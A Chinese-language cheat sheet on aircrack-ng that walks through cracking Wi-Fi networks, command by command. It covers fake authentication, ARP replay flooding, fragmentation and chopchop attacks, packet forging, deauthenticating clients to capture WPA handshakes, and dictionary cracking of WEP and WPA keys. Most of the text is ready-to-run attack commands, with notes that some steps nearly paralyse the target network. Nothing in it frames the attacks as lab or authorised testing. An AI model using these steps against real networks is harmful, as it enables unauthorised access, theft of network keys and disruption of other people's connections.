aircrack-ng详解
初始化工作
airmon-ng start wlan0 9
打开一个网卡监听设备,并设置到channel 9; channel可用iwconfig修改
airodump-ng mon0
无参数启动airodump-ng可查看所有接收范围内的AP、Client信息
aireplay-ng -9 -e (bssid) -a (AP Mac) ath0
测试注入攻击链路质量
airodump-ng -c (channel) --bssid (AP Mac) -w output ath0
监听AP在频道的所有数据包并保存到output文件,此步应在以下步骤提到airodump的时候执行
WEP:
aireplay-ng -1 0 -e (bssid) -a (AP Mac) -h (Host Mac) ath0
伪认证联机请求
aireplay-ng -1 6000 -o 1 -q 10 -e (bssid) -a (AP Mac) -h (Host Mac) ath0
伪认证联机请求并发送保持在线数据
airodump-ng -c (channel) --bssid (AP Mac) -w output ath0
监听收集
aireplay-ng -3 -b (AP Mac) -h (Host Mac) ath0
监听arp报文,一旦出现就不断将该报文重发,使目标机器产生实际回应数据,发回更多IV数据。
此时若有“内奸”,即有可控制的已经连接在目标网段的机器,ping一个网段内不存在的IP即可产生这样一个arp报文,接下来可以运行aircrack破解了。注意这个步骤可能会对目标局域网产生类似ARP洪水攻击一样的效果,网内数据延时丢包都很严重。
对于无机器连接的WEP:
aireplay-ng -5 -b (AP Mac) -h (Host Mac) ath0
Fragmenation攻击,监听一个AP广播出来的数据包,并抽离有效的伪随机数据(PRGA),保存到fragment-XXXX-XXXXX.xor文件供下一步使用.
有时监听到的不是广播包,转发攻击后ap没有回应,一系列重试后程序会重新监听; 有时候可能需要不少时间,加-F参数可以自动应答。
aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0
chopchop攻击,上述攻击不奏效可试,相同作用
packetforge-ng -0 -a (AP Mac) -h (Host Mac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request
根据fragment-0203-180343.xor文件的PRGA,产生arp请求包,保存到arp-request文件
使用-k 192.168.1.1 -l 10.255.255.255可使AP产生两倍的有效IV,192.168.1.1为确实存在的IP,通常的网关
使用-k 192.168.1.89 -l 10.255.255.255可使AP产生三倍的有效IV,192.168.1.89为确实存在的客户端IP
airodump-ng -c (channel) --bssid (AP Mac) -w output ath0
监听收集
aireplay-ng -2 -r arp-request ath0
不断注入上述产生的arp-request报文
这一步也会使目标网络接近瘫痪,极大延时,丢包。
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (AP Map) -h (Host Mac) ath0
上述产生、发送arp-request的步骤可由这一步替换,这是转发任何一个收到的有效数据包,方便,缺点是若数据包较大,转发过程较慢。还可使用-r capture-01.cap读取以前读取的有效数据进行转发注入。
aircrack-ng -b (AP Mac) capture*.cap
解密
aircrack-ng -b (AP Mac) capture*.cap
另一种解密算法
WPA/WPA2:
airodump-ng -c (channel) --bssid (AP Mac) -w output ath0
监听捕捉另外一客户端与ap之间的连接,上方出现WPA handshake: xx:xx…为成功
aireplay-ng -0 1 -a (AP Mac) -c (The Mac of a connected client) ath0
往已经连接到ap的一个客户端伪造一个离线包,使其离线重连以便捕捉handshake.
注意要收到ACK,才表明被攻击客户端收到,才会下线;发送离线不宜过密过多。
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 output*.cap
暴力破解。password.lst为密码字典,破解的成功率取决于字典的覆盖程度以及机器的速度。